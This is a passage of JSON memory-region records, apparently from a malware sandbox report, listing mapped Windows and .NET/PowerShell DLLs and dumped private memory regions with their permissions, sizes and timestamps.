"region_type": "memory_mapped_file", "start_va": 8791746347008, "timestamp": "00:00:38.029", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791741825024, "type": "region", "version": 1 }, "end_va": 8791742115839, "entry_point": 8791741829220, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_571", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791741825024, "timestamp": "00:00:38.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791593713664, "type": "region", "version": 1 }, "end_va": 8791594340351, "entry_point": 8791593723504, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_572", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791593713664, "timestamp": "00:00:38.053", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791737565184, "type": "region", "version": 1 }, "end_va": 8791737614335, "entry_point": 8791737569380, "filename": "\\Windows\\System32\\version.dll", "id": "region_573", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791737565184, "timestamp": "00:00:38.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 28966912, "type": "region", "version": 1 }, "end_va": 28971007, "entry_point": 0, "filename": null, "id": "region_592", "name": "pagefile_0x0000000001ba0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28966912, "timestamp": "00:00:38.337", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000593-addr_0x0000000002a50000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_59", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 44367872, "type": "region", "version": 1 }, "end_va": 44892159, "entry_point": 0, "filename": null, "id": "region_593", "name": "private_0x0000000002a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 44367872, "timestamp": "00:00:38.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1964507136, "type": "region", "version": 1 }, "end_va": 1965330431, "entry_point": 1964507136, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_594", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1964507136, "timestamp": "00:00:38.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10080256, "start_va": 8791387078656, "type": "region", "version": 1 }, "end_va": 8791397158911, "entry_point": 8791387078656, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll", "id": "region_595", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 8791387078656, "timestamp": "00:00:38.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 29032448, "type": "region", "version": 1 }, "end_va": 29044735, "entry_point": 0, "filename": null, "id": "region_614", "name": "pagefile_0x0000000001bb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29032448, "timestamp": "00:00:41.688", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 29102079, "entry_point": 0, "filename": null, "id": "region_615", "name": "pagefile_0x0000000001bc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29097984, "timestamp": "00:00:41.688", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000616-addr_0x0000000001be0000-size_0x0000000000020000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_61", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 29229056, "type": "region", "version": 1 }, "end_va": 29360127, "entry_point": 0, "filename": null, "id": "region_616", "name": "private_0x0000000001be0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29229056, "timestamp": "00:00:41.688", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000617-addr_0x0000000002910000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_62", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 43057152, "type": "region", "version": 1 }, "end_va": 44105727, "entry_point": 0, "filename": null, "id": "region_617", "name": "private_0x0000000002910000", "norm_filename": null, "region_type": "private_memory", "start_va": 43057152, "timestamp": "00:00:41.688", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000618-addr_0x0000000002b10000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_63", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 45154304, "type": "region", "version": 1 }, "end_va": 45678591, "entry_point": 0, "filename": null, "id": "region_618", "name": "private_0x0000000002b10000", "norm_filename": null, "region_type": "private_memory", "start_va": 45154304, "timestamp": "00:00:41.689", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000619-addr_0x0000000002b90000-size_0x0000000000101000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_64", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 45678592, "type": "region", "version": 1 }, "end_va": 46731263, "entry_point": 0, "filename": null, "id": "region_619", "name": "private_0x0000000002b90000", "norm_filename": null, "region_type": "private_memory", "start_va": 45678592, "timestamp": "00:00:41.689", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000620-addr_0x0000000002cc0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_65", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 46923776, "type": "region", "version": 1 }, "end_va": 46989311, "entry_point": 0, "filename": null, "id": "region_620", "name": "private_0x0000000002cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46923776, "timestamp": "00:00:41.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 402653184, "start_va": 46989312, "type": "region", "version": 1 }, "end_va": 449642495, "entry_point": 0, "filename": null, "id": "region_621", "name": "private_0x0000000002cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46989312, "timestamp": "00:00:41.697", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000622-addr_0x000000001acd0000-size_0x00000000006d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_66", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 7143424, "start_va": 449642496, "type": "region", "version": 1 }, "end_va": 456785919, "entry_point": 0, "filename": null, "id": "region_622", "name": "private_0x000000001acd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 449642496, "timestamp": "00:00:41.698", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000623-addr_0x000000001b4c0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_67", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 457965568, "type": "region", "version": 1 }, "end_va": 458489855, "entry_point": 0, "filename": null, "id": "region_623", "name": "private_0x000000001b4c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 457965568, "timestamp": "00:00:41.698", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 15581184, "start_va": 8791371481088, "type": "region", "version": 1 }, "end_va": 8791387062271, "entry_point": 8791371481088, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "id": "region_624", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791371481088, "timestamp": "00:00:41.699", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000625-addr_0x000007ff00020000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_68", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798185984, "type": "region", "version": 1 }, "end_va": 8791798251519, "entry_point": 0, "filename": null, "id": "region_625", "name": "private_0x000007ff00020000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798185984, "timestamp": "00:00:41.706", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000626-addr_0x000007ff00030000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_69", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798251520, "type": "region", "version": 1 }, "end_va": 8791798317055, "entry_point": 0, "filename": null, "id": "region_626", "name": "private_0x000007ff00030000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798251520, "timestamp": "00:00:41.707", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000627-addr_0x000007ff00040000-size_0x00000000000a0000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_70", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 8791798317056, "type": "region", "version": 1 }, "end_va": 8791798972415, "entry_point": 0, "filename": null, "id": "region_627", "name": "private_0x000007ff00040000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798317056, "timestamp": "00:00:41.707", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000628-addr_0x000007ff000e0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_71", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798972416, "type": "region", "version": 1 }, "end_va": 8791799037951, "entry_point": 0, "filename": null, "id": "region_628", "name": "private_0x000007ff000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798972416, "timestamp": "00:00:41.707", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000629-addr_0x000007ff000f0000-size_0x0000000000070000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_72", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 8791799037952, "type": "region", "version": 1 }, "end_va": 8791799496703, "entry_point": 0, "filename": null, "id": "region_629", "name": "private_0x000007ff000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799037952, "timestamp": "00:00:41.707", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000630-addr_0x000007fffffd3000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_73", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_630", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:00:41.708", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000631-addr_0x000007fffffd5000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_74", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092846080, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_631", "name": "private_0x000007fffffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092846080, "timestamp": "00:00:41.708", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000632-addr_0x000007fffff10000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_75", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8796092039168, "type": "region", "version": 1 }, "end_va": 8796092104703, "entry_point": 0, "filename": null, "id": "region_632", "name": "private_0x000007fffff10000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092039168, "timestamp": "00:00:41.911", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000633-addr_0x000007fffff20000-size_0x0000000000090000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_76", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 8796092104704, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_633", "name": "private_0x000007fffff20000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092104704, "timestamp": "00:00:41.911", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000634-addr_0x0000000001bd0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_77", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29163520, "type": "region", "version": 1 }, "end_va": 29229055, "entry_point": 0, "filename": null, "id": "region_634", "name": "private_0x0000000001bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29163520, "timestamp": "00:00:43.686", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 458489856, "type": "region", "version": 1 }, "end_va": 461512703, "entry_point": 458489856, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_635", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 458489856, "timestamp": "00:00:43.686", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10629120, "start_va": 8791355424768, "type": "region", "version": 1 }, "end_va": 8791366053887, "entry_point": 8791355424768, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll", "id": "region_636", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791355424768, "timestamp": "00:00:43.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 8791416307712, "type": "region", "version": 1 }, "end_va": 8791417036799, "entry_point": 8791416307712, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_637", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791416307712, "timestamp": "00:00:43.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11915264, "start_va": 8791343497216, "type": "region", "version": 1 }, "end_va": 8791355412479, "entry_point": 8791343497216, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll", "id": "region_638", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791343497216, "timestamp": "00:00:44.357", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000639-addr_0x000007ff00160000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_78", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799496704, "type": "region", "version": 1 }, "end_va": 8791799562239, "entry_point": 0, "filename": null, "id": "region_639", "name": "private_0x000007ff00160000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799496704, "timestamp": "00:00:44.366", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 31404031, "entry_point": 31391744, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_640", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 31391744, "timestamp": "00:00:44.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 456785920, "type": "region", "version": 1 }, "end_va": 457572351, "entry_point": 456785920, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_641", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 456785920, "timestamp": "00:00:44.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2003894272, "type": "region", "version": 1 }, "end_va": 2003922943, "entry_point": 2003898476, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_642", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2003894272, "timestamp": "00:00:44.846", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000643-addr_0x0000000001e00000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_79", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 31457280, "type": "region", "version": 1 }, "end_va": 31461375, "entry_point": 0, "filename": null, "id": "region_643", "name": "private_0x0000000001e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 31457280, "timestamp": "00:00:45.207", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 31522816, "type": "region", "version": 1 }, "end_va": 31543295, "entry_point": 31522816, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_644", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 31522816, "timestamp": "00:00:45.737", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 33357824, "type": "region", "version": 1 }, "end_va": 33624063, "entry_point": 33357824, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_645", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 33357824, "timestamp": "00:00:45.738", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000646-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_80", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799562240, "type": "region", "version": 1 }, "end_va": 8791799627775, "entry_point": 0, "filename": null, "id": "region_646", "name": "private_0x000007ff00170000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799562240, "timestamp": "00:00:45.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 31588352, "type": "region", "version": 1 }, "end_va": 31621119, "entry_point": 31588352, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_647", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 31588352, "timestamp": "00:00:47.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 31653888, "type": "region", "version": 1 }, "end_va": 31657983, "entry_point": 0, "filename": null, "id": "region_648", "name": "pagefile_0x0000000001e30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31653888, "timestamp": "00:00:47.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 299008, "start_va": 505610240, "type": "region", "version": 1 }, "end_va": 505909247, "entry_point": 505610240, "filename": "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_649", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 505610240, "timestamp": "00:00:47.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 937984, "start_va": 8791337730048, "type": "region", "version": 1 }, "end_va": 8791338668031, "entry_point": 8791337730048, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll", "id": "region_650", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791337730048, "timestamp": "00:00:47.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 696320, "start_va": 8791338713088, "type": "region", "version": 1 }, "end_va": 8791339409407, "entry_point": 8791338713088, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll", "id": "region_651", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791338713088, "timestamp": "00:00:47.434", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 8791339433984, "type": "region", "version": 1 }, "end_va": 8791339638783, "entry_point": 8791339433984, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll", "id": "region_652", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791339433984, "timestamp": "00:00:47.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 8791339696128, "type": "region", "version": 1 }, "end_va": 8791340126207, "entry_point": 8791339696128, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_653", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791339696128, "timestamp": "00:00:47.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3334144, "start_va": 8791340154880, "type": "region", "version": 1 }, "end_va": 8791343489023, "entry_point": 8791340154880, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll", "id": "region_654", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791340154880, "timestamp": "00:00:47.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" 